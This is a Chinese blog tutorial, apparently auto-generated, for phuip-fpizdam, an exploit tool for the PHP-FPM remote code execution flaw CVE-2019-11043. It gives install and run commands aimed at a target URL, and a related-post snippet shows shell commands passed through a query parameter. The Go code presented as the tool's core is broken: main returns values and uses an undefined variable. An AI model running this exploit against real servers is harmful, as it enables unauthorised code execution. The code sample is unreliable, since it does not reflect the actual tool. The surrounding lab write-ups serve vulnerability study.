phuip-fpizdam 项目使用教程

于 2024-08-12 08:50:02 发布
阅读量386 收藏 4
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00260/article/details/141120062
版权

phuip-fpizdam 项目使用教程

phuip-fpizdamExploit for CVE-2019-11043项目地址:https://gitcode.com/gh_mirrors/ph/phuip-fpizdam

1. 项目的目录结构及介绍

phuip-fpizdam 项目的目录结构相对简单,主要包含以下几个部分:

phuip-fpizdam/
├── requester.go
├── README.md
├── LICENSE
└── ...
  • requester.go: 项目的主要代码文件,负责实现漏洞利用的核心逻辑。
  • README.md: 项目的说明文档,包含项目的基本介绍、使用方法等。
  • LICENSE: 项目的许可证文件,本项目采用 MIT 许可证。

2. 项目的启动文件介绍

项目的启动文件是 requester.go,该文件包含了漏洞利用的主要逻辑。以下是 requester.go 文件的部分关键代码:

package main

import (
    "net/http"
    "io/ioutil"
    "time"
)

func main() {
    req, err := http.NewRequest("GET", "http://example.com", nil)
    if err != nil {
        // 错误处理
    }
    req.Header.Set("Ebut", "mamku tvoyu")
    resp, err := r.cl.Do(req)
    if resp != nil {
        defer func() { _ = resp.Body.Close() }()
    }
    if err != nil {
        // 错误处理
    }
    data, err := ioutil.ReadAll(resp.Body)
    time.Sleep(r.delay)
    return resp, data, err
}

该文件主要负责创建 HTTP 请求,设置请求头,发送请求并处理响应。

3. 项目的配置文件介绍

phuip-fpizdam 项目没有显式的配置文件,其配置主要通过命令行参数传递。以下是项目的基本使用方法:

go get github.com/neex/phuip-fpizdam
phuip-fpizdam [url]

其中 [url] 是需要进行漏洞利用的目标 URL。如果遇到编译错误,请确保使用 Go 1.13 或更高版本。

以上是 phuip-fpizdam 项目的基本使用教程,希望对您有所帮助。

phuip-fpizdamExploit for CVE-2019-11043项目地址:https://gitcode.com/gh_mirrors/ph/phuip-fpizdam

邵娇湘
关注
CVE-2019-11043 PHP-fpm 远程代码执行漏洞复现
afei001
01-21 415
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Vulnhub搭建CVE-2019-11043漏洞环境 5.2 CVE-2019-11043漏洞利用 (1)phuip-fpizdam工具利用 (2)github CVE-2019-11043_RCE_1.py (3)CVE-2019-11043_RCE_2.py 6.漏洞修复 1.漏洞概述 在长亭科技举办的 Real World CTF中,国外安全研究员 Andrew Dana...
CVE-2019-11043 PHP在Nginx配置下任意代码执行漏洞
潜心学安全的小白
10-26 965
目录漏洞背景漏洞影响版本漏洞成因漏洞复现环境搭建① github下载vulhub② 启动漏洞环境③ 安装go语言漏洞利用修复建议参考链接 漏洞背景 2019年10月23日,PHP 官方发布了在 nginx 配置不当的情况下php-fpm 可导致远程代码执行的漏洞更新。 此漏洞是由国外安全研究员 Andrew Danau 在9 月14日至18日举办的Real World CTF 中解决一道CTF题目...
phuip-fpizdam:CVE-2019-11043的漏洞利用
02-22
菲力浦 这是什么 这是php-fpm(CVE-2019-11043)中的错误的利用。 在某些Nginx + php-fpm配置中,该错误可能是从外部触发的。 这意味着,如果您的配置易受攻击,则Web用户可能会执行代码(请参阅)。 写上去 尽管我们懒得写论文,但蔡健熙在他的博客中发表。 对他表示敬意。 此外,我ZeroNights 2019的幻灯片。 易受伤害的是什么 如果网络服务器运行nginx + php-fpm,并且nginx的配置类似于 location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... } 它也缺少任何脚本存
vulhub-php cve-2019-11043
ANYOUZHEN的博客
06-04 423
漏洞描述:Nginx上fastcgi_split_path_info在处理带有%0a的请求时,会因为遇到换行符\n导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷。攻击者通过精心构造和利用的PAYLOAD,可以导致远程代码执行。但Nginx使用的这个fastcgi配置,并非Nginx默认配置 受影响的版本:使用Nginx + php-fpm配置的服务器,并且在nginx/conf/nginx.confg配置文件中采用如下配置的时候,都会出现RCE漏洞 fas
php漏洞cve,PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
weixin_34462016的博客
03-09 448
作者:LoRexxar'@知道创宇404实验室时间:2019年10月25日国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年10月23日,github公开漏洞相关的详情以及exp。当nginx配置不当时,会导致php-fpm远程任意代码执行。下面我们就来一点点看看漏洞的详细分析,文章中漏洞分析部...
CVE-2019-11043(PHP远程代码执行漏洞)
m0_51468027的博客
02-12 9078
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
ctfshow-phpCVE
njh18790816639的博客
04-20 659
前言 首先要安装go语言!这个需要配置好,有点难配置!此时我们下载phuip-fpizdam这个工具! web311 这里就要用到了phuip-fpizdam这个工具了! 然后再用index.php?a的命令去执行! web312(CVE-2018-19518) PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功
CVE-2019-11043-Docker
04-25
从https://github.com/neex/phuip-fpizdam构建二进制文件,然后 root@debian:~/gopath/bin# curl "localhost:8080/?a=/bin/sh+-c+'which+which'" 1 root@debian:~/gopath/bin#./phuip-fpizdam ...
CVE-2019-11043:PHP-FPM在Nginx特定配置下远程代码执行漏洞
冠霖L的博客
11-03 611
0x00 漏洞介绍 nginx + php-fpm 配置不当,当nginx配置文件中有fastcgi_split_path_info模块,在处理带%0a的请求时,对换行符\n 处置不当使得将PATH_INFO值置为空,从而导致可以通过FCGI_PUTENV与PHP_VALUE相结合,修改当前的php-fpm进程中的php配置,在特殊构造的配置生效的情况下可以触发任意代码执行。 0x01 影响范围 ...
php-fpm漏洞复现(CVE-2019-11043)
frinck的博客
11-08 1460
1.php-fpm漏洞详情 当nginx使用特定的fastcgi配置的时候,就会存在远程代码执行漏洞,但是这个配置并不是默认配置 fastcgi_split_path_info字段配置为^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造playload造成远程代码执行,改配置已经被广泛使用,危害较大。 2.复现 安装docker环境 git clone https://gith...
php定时执行代码漏洞_【漏洞预警】PHP远程代码执行漏洞
weixin_29541589的博客
01-10 139
漏洞描述2019年9月26日,PHP官方发布漏洞通告,披露了一个远程代码执行漏洞CVE-2019-11043,此漏洞由于在使用PHP-FPM + Nginx组合并采用一定配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。漏洞编号CVE-2019-11043漏洞级别高危影响范围PHP 5.6-7.x漏洞复现使用 phuip-fpizdam进行验证,如下图所示。运行成功之...
CVE-2019-11043远程代码执行漏洞复现
qq_42133828的博客
11-02 7481
CVE-2019-11043远程代码执行漏洞复现 漏洞名称: php fastcgi 远程命令执行漏洞 漏洞类型: 远程代码执行漏洞 漏洞危害: 高危 漏洞来源: https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/ 公布时间: 2019-10-28 涉及应用版本: <7.1.33的PHP版本7.1.x ...
PHP-FPM远程命令执行(CVE-2019-11043)getshell——漏洞复现
W小哥
12-16 897
一、漏洞原理 漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码执行。(当nginx配置不当时,会导致php-fpm远程任意代码执行。) 二、环境搭建 使用vulhub搭
在CTF比赛中发现的PHP远程代码执行0day漏洞
NOSEC2019的博客
10-23 965
众所周知,CTF比赛都是人为构造漏洞环境,人为制造安全漏洞,供安全从爱好者研究,好磨练和增强自己的安全技能。 参加CTF比赛,通常你需要明白出题人的想法,按照出题人的意图来解开谜题。 但是,就像所有的游戏一样,在一些未知的地方,总是存在BUG。有时候参赛人员出人意料的行为和动作,会接触到一些从未有人探索过的领域——0day。这是出题人从未预料到的,这就像在一场比赛中参赛者找到了一条比官方航线更好...
cve-2019-11043复现(靶机为Ubuntu18.04,php编译安装)
ckm1607011的博客
02-29 889
最近做的项目需要复现nginx的exp,其中就包括cve-2019-11043这个exp,他是一个远程代码执行的exp; 这个cve的来源:GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043 我看了之后在Kali上把源码编译了,大家注意编译需要1.13以上版本的go,编译出来的可执行文件在linux平台上就都可以执行了; 让我感到...
CVE-2019-11043 Nginx PHP 远程代码执行漏洞复现----自我学习
Ping_Pig的博客
10-27 3820
漏洞简介: 来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞,9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用,危害较大 漏洞概述: Nginx上fas...
【漏洞复现】PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
Hi~ 土拨鼠
12-26 610
文章目录一、漏洞简介二、漏洞环境准备三、漏洞复现 一、漏洞简介 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送换行符%0a 时,服务器返回异常。该漏洞需要在nginx.conf 中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.p
rhino grasshoper 框内物体排列(附视频).gh
最新发布
10-18
【闭合线内物体按方向移动/排列】https://www.bilibili.com/video/BV1z1WfeSEWu?vd_source=b420114c993138474d2e93d83ead77a5
kwant-1.4.3-cp38-cp38-win_amd64.whl
10-18
kwant-1.4.3-cp38-cp38-win_amd64.whl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

邵娇湘

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值